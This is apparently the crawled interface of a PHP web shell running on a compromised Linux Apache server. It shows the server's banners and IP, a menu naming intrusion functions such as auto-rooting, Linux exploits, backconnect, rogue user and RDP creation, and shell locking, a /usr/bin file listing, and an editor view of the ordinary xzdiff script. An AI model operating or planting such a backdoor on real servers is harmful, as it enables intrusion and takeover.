Linux localhost 4.18.0-553.85.1.el8_10.x86_64 #1 SMP
Apache/2.4.68 (Unix)
: | : 216.73.217.87
Cant Read [ /etc/named.conf ]
8.1.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
[
63.53
KB
-rwxr-xr-x
animate
8.61
KB
-rwxr-xr-x
awk
763.51
KB
-rwxr-xr-x
b2sum
77.4
KB
-rwxr-xr-x
base32
55.69
KB
-rwxr-xr-x
base64
55.68
KB
-rwxr-xr-x
basename
46.9
KB
-rwxr-xr-x
basenc
69.75
KB
-rwxr-xr-x
bash
1.51
MB
-rwxr-xr-x
bashbug
6.7
KB
-r-xr-xr-x
bunzip2
282.37
KB
-rwxrwxr-x
bzcat
282.37
KB
-rwxrwxr-x
bzcmp
2.09
KB
-rwxrwxr-x
bzdiff
2.09
KB
-rwxrwxr-x
bzegrep
2.01
KB
-rwxrwxr-x
bzfgrep
2.01
KB
-rwxrwxr-x
bzgrep
2.01
KB
-rwxrwxr-x
bzip2
282.37
KB
-rwxrwxr-x
bzip2recover
28.73
KB
-rwxrwxr-x
bzless
1.23
KB
-rwxrwxr-x
bzmore
1.23
KB
-rwxrwxr-x
cat
52.81
KB
-rwxr-xr-x
chcon
88.21
KB
-rwxr-xr-x
chgrp
87.02
KB
-rwxr-xr-x
chmod
57.21
KB
-rwxr-xr-x
chown
87.2
KB
-rwxr-xr-x
chroot
60.1
KB
-rwxr-xr-x
cksum
51.06
KB
-rwxr-xr-x
col
23.88
KB
-rwxr-xr-x
comm
56.23
KB
-rwxr-xr-x
compare
12.69
KB
-rwxr-xr-x
composite
8.56
KB
-rwxr-xr-x
conjure
8.55
KB
-rwxr-xr-x
convert
8.55
KB
-rwxr-xr-x
cp
151.55
KB
-rwxr-xr-x
csplit
166.02
KB
-rwxr-xr-x
curl
320.79
KB
-rwxr-xr-x
cut
60.67
KB
-rwxr-xr-x
cvs
795.5
KB
-rwxr-xr-x
date
60.74
KB
-rwxr-xr-x
dd
88.95
KB
-rwxr-xr-x
df
102.88
KB
-rwxr-xr-x
diff
195.46
KB
-rwxr-xr-x
dir
174.98
KB
-rwxr-xr-x
dircolors
59.88
KB
-rwxr-xr-x
dirname
46.75
KB
-rwxr-xr-x
du
110.34
KB
-rwxr-xr-x
echo
50.54
KB
-rwxr-xr-x
egrep
28
B
-rwxr-xr-x
env
28.33
KB
-rwxr-xr-x
ex
4
MB
-rwxr-xr-x
expand
52
KB
-rwxr-xr-x
expr
160.28
KB
-rwxr-xr-x
factor
94.27
KB
-rwxr-xr-x
false
46.25
KB
-rwxr-xr-x
fgrep
28
B
-rwxr-xr-x
find
1.69
MB
-rwxr-xr-x
fmt
60.36
KB
-rwxr-xr-x
fold
51.55
KB
-rwxr-xr-x
ftp
171.21
KB
-rwxr-xr-x
funzip
30.25
KB
-rwxr-xr-x
gawk
763.51
KB
-rwxr-xr-x
geqn
144.41
KB
-rwxr-xr-x
git
4.47
MB
-rwxr-xr-x
git-cvsserver
159.46
KB
-rwxr-xr-x
git-receive-pack
4.47
MB
-rwxr-xr-x
git-shell
2.69
MB
-rwxr-xr-x
git-upload-archive
4.47
MB
-rwxr-xr-x
git-upload-pack
4.47
MB
-rwxr-xr-x
gpic
180.41
KB
-rwxr-xr-x
grep
320.13
KB
-rwxr-xr-x
groff
81.63
KB
-rwxr-xr-x
groups
51.22
KB
-rwxr-xr-x
gtar
655.36
KB
-rwxr-xr-x
gtbl
115.96
KB
-rwxr-xr-x
gunzip
2.28
KB
-rwxr-xr-x
gzexe
6.29
KB
-rwxr-xr-x
gzip
131.16
KB
-rwxr-xr-x
head
40.51
KB
-rwxr-xr-x
hostid
46.62
KB
-rwxr-xr-x
hostname
15.41
KB
-rwxr-xr-x
htpasswd
217.91
KB
-rwxrwxr-x
id
36.52
KB
-rwxr-xr-x
identify
8.6
KB
-rwxr-xr-x
import
8.6
KB
-rwxr-xr-x
info
398.34
KB
-rwxr-xr-x
install
181.31
KB
-rwxr-xr-x
install-info
151.73
KB
-rwxr-xr-x
jhead
79.46
KB
-rwxrwxr-x
join
77.8
KB
-rwxr-xr-x
kill
51.71
KB
-rwxr-xr-x
ksh
1.45
MB
-rwxr-xr-x
less
243.45
KB
-rwxr-xr-x
lessecho
12.98
KB
-rwxr-xr-x
lesskey
19.48
KB
-rwxr-xr-x
link
46.61
KB
-rwxr-xr-x
ln
90.14
KB
-rwxr-xr-x
locale
37.11
KB
-rwxr-xr-x
logname
46.66
KB
-rwxr-xr-x
ls
114.85
KB
-rwxr-xr-x
lzcat
310.7
KB
-rwxr-xr-x
lzcmp
7.41
KB
-rwxr-xr-x
lzdiff
7.41
KB
-rwxr-xr-x
lzegrep
10.17
KB
-rwxr-xr-x
lzfgrep
10.17
KB
-rwxr-xr-x
lzgrep
10.17
KB
-rwxr-xr-x
lzless
2.33
KB
-rwxr-xr-x
lzma
310.7
KB
-rwxr-xr-x
lzmadec
47.3
KB
-rwxr-xr-x
lzmainfo
62.14
KB
-rwxr-xr-x
lzmore
2.18
KB
-rwxr-xr-x
mail
383.67
KB
-rwxr-xr-x
makeinfo
52.86
KB
-rwxr-xr-x
man
100.44
KB
-rwxr-xr-x
mc
1.32
MB
-rwxr-xr-x
mcdiff
1.32
MB
-rwxr-xr-x
mcedit
1.32
MB
-rwxr-xr-x
mcview
1.32
MB
-rwxr-xr-x
md5sum
60.48
KB
-rwxr-xr-x
mkdir
77.9
KB
-rwxr-xr-x
mkfifo
88.56
KB
-rwxr-xr-x
mknod
92.85
KB
-rwxr-xr-x
mktemp
61.2
KB
-rwxr-xr-x
mogrify
8.55
KB
-rwxr-xr-x
montage
8.55
KB
-rwxr-xr-x
more
40.15
KB
-rwxr-xr-x
mv
127.3
KB
-rwxr-xr-x
mysql
9.1
MB
-rwx--x--x
mysqldump
8.25
MB
-rwx--x--x
mysqlimport
7.95
MB
-rwx--x--x
mysqlshow
7.95
MB
-rwx--x--x
nano
914.13
KB
-rwxr-xr-x
neqn
271
B
-rwxr-xr-x
nice
50.86
KB
-rwxr-xr-x
nl
153.14
KB
-rwxr-xr-x
nohup
51.47
KB
-rwxr-xr-x
nproc
51.19
KB
-rwxr-xr-x
nroff
3.31
KB
-rwxr-xr-x
numfmt
81.95
KB
-rwxr-xr-x
od
64.81
KB
-rwxr-xr-x
openssl
974.41
KB
-rwxr-xr-x
paste
51.22
KB
-rwxr-xr-x
pathchk
50.69
KB
-rwxr-xr-x
pdftexi2dvi
1.14
KB
-rwxr-xr-x
pear
830
B
-rwxr-xr-x
pear5
830
B
-rwxr-xr-x
perl
3.6
MB
-rwxr-xr-x
perl5
3.6
MB
-rwxr-xr-x
perl510
3.6
MB
-rwxr-xr-x
perl510pl
3.6
MB
-rwxr-xr-x
perl518
1.48
MB
-rwxr-xr-x
perl536
3.6
MB
-rwxr-xr-x
perl58
3.6
MB
-rwxr-xr-x
perl58pl
3.6
MB
-rwxr-xr-x
perl5pl
3.6
MB
-rwxr-xr-x
php
26.42
KB
-rwxrwxr-x
php3
16.61
MB
-rwxr-xr-x
php4
16.61
MB
-rwxr-xr-x
php43
16.61
MB
-rwxr-xr-x
php43pl
16.61
MB
-rwxr-xr-x
php44
16.61
MB
-rwxr-xr-x
php44pl
16.61
MB
-rwxr-xr-x
php5
16.61
MB
-rwxr-xr-x
php52
16.61
MB
-rwxr-xr-x
php53
26.42
KB
-rwxrwxr-x
php53es
15.44
MB
-rwxr-xr-x
php55
16.61
MB
-rwxr-xr-x
php56
26.42
KB
-rwxrwxr-x
php56es
16.61
MB
-rwxr-xr-x
php5pl
16.61
MB
-rwxr-xr-x
php70
26.42
KB
-rwxrwxr-x
php70es
16.21
MB
-rwxr-xr-x
php71
26.42
KB
-rwxrwxr-x
php71es
17.61
MB
-rwxr-xr-x
php72
26.42
KB
-rwxrwxr-x
php72es
20.37
MB
-rwxr-xr-x
php73
26.42
KB
-rwxrwxr-x
php73es
20.82
MB
-rwxr-xr-x
php74
26.42
KB
-rwxrwxr-x
php74es
22.37
MB
-rwxr-xr-x
php80
26.42
KB
-rwxrwxr-x
php80es
22.36
MB
-rwxr-xr-x
php81
26.42
KB
-rwxrwxr-x
php81es
24.53
MB
-rwxr-xr-x
php82
24.68
MB
-rwxr-xr-x
php83
26.71
MB
-rwxr-xr-x
php84
29.77
MB
-rwxr-xr-x
php85
32.79
MB
-rwxr-xr-x
phpdbg56
16.74
MB
-rwxr-xr-x
phpdbg70
16.43
MB
-rwxr-xr-x
phpdbg71
17.85
MB
-rwxr-xr-x
phpdbg72
20.61
MB
-rwxr-xr-x
phpdbg73
21.06
MB
-rwxr-xr-x
phpdbg74
22.38
MB
-rwxr-xr-x
phpdbg80
22.38
MB
-rwxr-xr-x
phpdbg81
24.54
MB
-rwxr-xr-x
phpdbg82
24.69
MB
-rwxr-xr-x
phpdbg83
26.72
MB
-rwxr-xr-x
phpdbg84
29.78
MB
-rwxr-xr-x
phpdbg85
32.81
MB
-rwxr-xr-x
pinky
56.7
KB
-rwxr-xr-x
pod2texi
19.93
KB
-rwxr-xr-x
postinstall.sh
518
B
-rwxr-xr-x
pr
101.19
KB
-rwxr-xr-x
printenv
46.52
KB
-rwxr-xr-x
printf
59.99
KB
-rwxr-xr-x
ptx
187.99
KB
-rwxr-xr-x
pwd
32.45
KB
-rwxr-xr-x
pydoc
88
B
-rwxrwxr-x
python
7.95
MB
-rwxr-xr-x
python2.7
7.95
MB
-rwxr-xr-x
python3
23.85
MB
-rwxr-xr-x
readlink
60.95
KB
-rwxr-xr-x
realpath
65.32
KB
-rwxr-xr-x
rm
61.4
KB
-rwxr-xr-x
rmdir
44.46
KB
-rwxr-xr-x
rnano
914.13
KB
-rwxr-xr-x
rsync
621.54
KB
-rwxr-xr-x
rsync-ssl
5.02
KB
-rwxr-xr-x
ruby
2.55
MB
-rwxr-xr-x
runcon
51.4
KB
-rwxr-xr-x
rview
4
MB
-rwxr-xr-x
rvim
4
MB
-rwxr-xr-x
scalar
2.74
MB
-rwxr-xr-x
scp
249.52
KB
-rwxrwxr-x
sed
74.29
KB
-rwxr-xr-x
seq
55.73
KB
-rwxr-xr-x
sh
941.93
KB
-rwxr-xr-x
sha1sum
60.49
KB
-rwxr-xr-x
sha224sum
60.85
KB
-rwxr-xr-x
sha256sum
60.85
KB
-rwxr-xr-x
sha384sum
60.85
KB
-rwxr-xr-x
sha512sum
60.85
KB
-rwxr-xr-x
shred
78.98
KB
-rwxr-xr-x
shuf
74.81
KB
-rwxr-xr-x
sleep
32.35
KB
-rwxr-xr-x
sort
114.94
KB
-rwxr-xr-x
split
75.23
KB
-rwxr-xr-x
ssh
1.01
MB
-rwxrwxr-x
ssh-keygen
613.59
KB
-rwxrwxr-x
stat
96.5
KB
-rwxr-xr-x
stdbuf
56.14
KB
-rwxr-xr-x
stream
8.55
KB
-rwxr-xr-x
stty
80.81
KB
-rwxr-xr-x
sum
60.15
KB
-rwxr-xr-x
sync
50.8
KB
-rwxr-xr-x
tac
148.66
KB
-rwxr-xr-x
tail
65.25
KB
-rwxr-xr-x
tar
655.36
KB
-rwxr-xr-x
tbl
115.96
KB
-rwxr-xr-x
tee
32.38
KB
-rwxr-xr-x
test
59.05
KB
-rwxr-xr-x
texi2any
52.86
KB
-rwxr-xr-x
texi2dvi
58.25
KB
-rwxr-xr-x
texi2pdf
1.14
KB
-rwxr-xr-x
texindex
3.9
KB
-rwxr-xr-x
timeout
57.35
KB
-rwxr-xr-x
touch
102.8
KB
-rwxr-xr-x
tr
64.63
KB
-rwxr-xr-x
true
46.24
KB
-rwxr-xr-x
truncate
55.15
KB
-rwxr-xr-x
tsort
63.86
KB
-rwxr-xr-x
tty
46.55
KB
-rwxr-xr-x
uname
32.3
KB
-rwxr-xr-x
uncompress
2.28
KB
-rwxr-xr-x
unexpand
52.05
KB
-rwxr-xr-x
uniq
60.84
KB
-rwxr-xr-x
unlink
46.62
KB
-rwxr-xr-x
unlzma
310.7
KB
-rwxr-xr-x
unxz
310.7
KB
-rwxr-xr-x
unzip
162.7
KB
-rwxr-xr-x
unzipsfx
78.64
KB
-rwxr-xr-x
uptime
64.64
KB
-rwxr-xr-x
users
51.21
KB
-rwxr-xr-x
vdir
174.98
KB
-rwxr-xr-x
vi
906.45
KB
-rwxr-xr-x
view
4
MB
-rwxr-xr-x
vim
4
MB
-rwxr-xr-x
vimdiff
4
MB
-rwxr-xr-x
wc
65.73
KB
-rwxr-xr-x
wget
621.87
KB
-rwxr-xr-x
whereis
20.2
KB
-rwxr-xr-x
who
61.02
KB
-rwxr-xr-x
whoami
46.7
KB
-rwxr-xr-x
wp
6.61
MB
-rwxr-xr-x
xargs
349.48
KB
-rwxr-xr-x
xxd
22.45
KB
-rwxr-xr-x
xz
310.7
KB
-rwxr-xr-x
xzcat
310.7
KB
-rwxr-xr-x
xzcmp
7.41
KB
-rwxr-xr-x
xzdec
96.67
KB
-rwxr-xr-x
xzdiff
7.41
KB
-rwxr-xr-x
xzegrep
10.17
KB
-rwxr-xr-x
xzfgrep
10.17
KB
-rwxr-xr-x
xzgrep
10.17
KB
-rwxr-xr-x
xzless
2.33
KB
-rwxr-xr-x
xzmore
2.18
KB
-rwxr-xr-x
yes
46.73
KB
-rwxr-xr-x
zcat
1.93
KB
-rwxr-xr-x
zcmp
1.64
KB
-rwxr-xr-x
zdiff
6.3
KB
-rwxr-xr-x
zegrep
29
B
-rwxr-xr-x
zfgrep
29
B
-rwxr-xr-x
zforce
2.03
KB
-rwxr-xr-x
zgrep
8.02
KB
-rwxr-xr-x
zip
219.59
KB
-rwxr-xr-x
zipcloak
109.42
KB
-rwxr-xr-x
zipgrep
2.88
KB
-rwxr-xr-x
zipinfo
162.7
KB
-rwxr-xr-x
zipnote
104.41
KB
-rwxr-xr-x
zipsplit
104.63
KB
-rwxr-xr-x
zless
2.38
KB
-rwxr-xr-x
zmore
1.79
KB
-rwxr-xr-x
znew
4.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xzdiff
#!/bin/sh # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 1998, 2002, 2006, 2007 Free Software Foundation # Copyright (C) 1993 Jean-loup Gailly # Modified for XZ Utils by Andrew Dudman and Lasse Collin. # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. #SET_PATH - This line is a placeholder to ease patching this script. # Instead of unsetting XZ_OPT, just make sure that xz will use file format # autodetection. This way memory usage limit and thread limit can be # specified via XZ_OPT. With gzip, bzip2, and lzop it's OK to just unset the # environment variables. xz='xz --format=auto' unset GZIP BZIP BZIP2 LZOP case ${0##*/} in *cmp*) prog=xzcmp; cmp=${CMP:-cmp};; *) prog=xzdiff; cmp=${DIFF:-diff};; esac version="$prog (XZ Utils) 5.6.3" usage="Usage: ${0##*/} [OPTION]... FILE1 [FILE2] Compare FILE1 to FILE2, using their uncompressed contents if they are compressed. If FILE2 is omitted, then the files compared are FILE1 and FILE1 from which the compression format suffix has been stripped. Do comparisons like '$cmp' does. OPTIONs are the same as for '$cmp'. Report bugs to <xz@tukaani.org>." # sed script to escape all ' for the shell, and then (to handle trailing # newlines correctly) turn trailing X on last line into '. escape=' s/'\''/'\''\\'\'''\''/g $s/X$/'\''/ ' while :; do case $1 in --h*) printf '%s\n' "$usage" || exit 2; exit;; --v*) printf '%s\n' "$version" || exit 2; exit;; --) shift; break;; -*\'*) cmp="$cmp '"`printf '%sX\n' "$1" | sed "$escape"`;; -?*) cmp="$cmp '$1'";; *) break;; esac shift done cmp="$cmp --" for file; do test "X$file" = X- || <"$file" || exit 2 done # xz needs -qQ to ignore warnings like unsupported check type. xz1="$xz -qQ" xz2="$xz -qQ" xz_status=0 exec 3>&1 if test $# -eq 1; then case $1 in *[-.]xz | *[-.]lzma | *[-.]lz | *.t[lx]z) ;; *[-.]bz2 | *.tbz | *.tbz2) xz1=bzip2;; *[-.][zZ] | *_z | *[-.]gz | *.t[ag]z) xz1=gzip;; *[-.]lzo | *.tzo) xz1=lzop;; *[-.]zst | *.tzst) xz1='zstd -q';; *[-.]lz4) xz1=lz4;; *) printf '%s\n' "$0: $1: Unknown compressed file name suffix" >&2 exit 2;; esac case $1 in *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *[-.]lzo | *[-.]zst | *[-.]lz4) FILE=`expr "X$1" : 'X\(.*\)[-.][abglmostxzZ24]*$'`;; *.t[abglx]z) FILE=`expr "X$1" : 'X\(.*[-.]t\)[abglx]z$'`ar;; *.tbz2) FILE=`expr "X$1" : 'X\(.*[-.]t\)bz2$'`ar;; *.tzo) FILE=`expr "X$1" : 'X\(.*[-.]t\)zo$'`ar;; *.tzst) FILE=`expr "X$1" : 'X\(.*[-.]t\)zst$'`ar;; esac xz_status=$( exec 4>&1 ($xz1 -cd -- "$1" 4>&-; echo $? >&4) 3>&- | eval "$cmp" - '"$FILE"' >&3 ) elif test $# -eq 2; then case $1 in *[-.]bz2 | *.tbz | *.tbz2) xz1=bzip2;; *[-.][zZ] | *_z | *[-.]gz | *.t[ag]z) xz1=gzip;; *[-.]lzo | *.tzo) xz1=lzop;; *[-.]zst | *.tzst) xz1='zstd -q';; *[-.]lz4) xz1=lz4;; esac case $2 in *[-.]bz2 | *.tbz | *.tbz2) xz2=bzip2;; *[-.][zZ] | *_z | *[-.]gz | *.t[ag]z) xz2=gzip;; *[-.]lzo | *.tzo) xz2=lzop;; *[-.]zst | *.tzst) xz2='zstd -q';; *[-.]lz4) xz2=lz4;; esac case $1 in *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *.t[abglx]z | *.tbz2 | *[-.]lzo | *.tzo | *[-.]zst | *.tzst | *[-.]lz4 | -) case "$2" in *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *.t[abglx]z | *.tbz2 | *[-.]lzo | *.tzo | *[-.]zst | *.tzst | *[-.]lz4 | -) if test "$1$2" = --; then xz_status=$( exec 4>&1 ($xz1 -cdf - 4>&-; echo $? >&4) 3>&- | eval "$cmp" - - >&3 ) elif # Reject Solaris 8's buggy /bin/bash 2.03. echo X | (echo X | eval "$cmp" /dev/fd/5 - >/dev/null 2>&1) 5<&0; then # NOTE: xz_status will contain two numbers. xz_status=$( exec 4>&1 ($xz1 -cdf -- "$1" 4>&-; echo $? >&4) 3>&- | ( ($xz2 -cdf -- "$2" 4>&-; echo $? >&4) 3>&- 5<&- </dev/null | eval "$cmp" /dev/fd/5 - >&3) 5<&0 ) else F=`expr "/$2" : '.*/\(.*\)[-.][ablmotxz2]*$'` || F=$prog tmp= trap ' test -n "$tmp" && rm -rf "$tmp" (exit 2); exit 2 ' HUP INT PIPE TERM 0 if type mktemp >/dev/null 2>&1; then # Note that FreeBSD's mktemp isn't fully compatible with # the implementations from mktemp.org and GNU coreutils. # It is important that the -t argument is the last argument # and that no "--" is used between -t and the template argument. # This way this command works on all implementations. tmp=`mktemp -d -t "$prog.XXXXXXXXXX"` || exit 2 else # Fallback code if mktemp is missing. This isn't as # robust as using mktemp since this doesn't try with # different file names in case of a file name conflict. # # There's no need to save the original umask since # we don't create any non-temp files. Note that using # mkdir -m 0077 isn't secure since some mkdir implementations # create the dir with the default umask and chmod the # the dir afterwards. umask 0077 mkdir -- "${TMPDIR-/tmp}/$prog.$$" || exit 2 tmp="${TMPDIR-/tmp}/$prog.$$" fi $xz2 -cdf -- "$2" > "$tmp/$F" || exit 2 xz_status=$( exec 4>&1 ($xz1 -cdf -- "$1" 4>&-; echo $? >&4) 3>&- | eval "$cmp" - '"$tmp/$F"' >&3 ) cmp_status=$? rm -rf "$tmp" || xz_status=$? trap - HUP INT PIPE TERM 0 (exit $cmp_status) fi;; *) xz_status=$( exec 4>&1 ($xz1 -cdf -- "$1" 4>&-; echo $? >&4) 3>&- | eval "$cmp" - '"$2"' >&3 );; esac;; *) case "$2" in *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *.t[abglx]z | *.tbz2 | *[-.]lzo | *.tzo | *[-.]zst | *.tzst | *[-.]lz4 | -) xz_status=$( exec 4>&1 ($xz2 -cdf -- "$2" 4>&-; echo $? >&4) 3>&- | eval "$cmp" '"$1"' - >&3 );; *) eval "$cmp" '"$1"' '"$2"';; esac;; esac else printf '%s\n' "$0: Invalid number of operands; try '${0##*/} --help' for help" >&2 exit 2 fi cmp_status=$? for num in $xz_status ; do # 0 from decompressor means successful decompression. SIGPIPE from # decompressor is possible when diff or cmp exits before the whole file # has been decompressed. In that case we want to retain the exit status # from diff or cmp. Note that using "trap '' PIPE" is not possible # because gzip changes its behavior (including exit status) if SIGPIPE # is ignored. test "$num" -eq 0 && continue test "$num" -ge 128 \ && test "$(kill -l "$num" 2> /dev/null)" = "PIPE" \ && continue exit 2 done exit $cmp_status
Close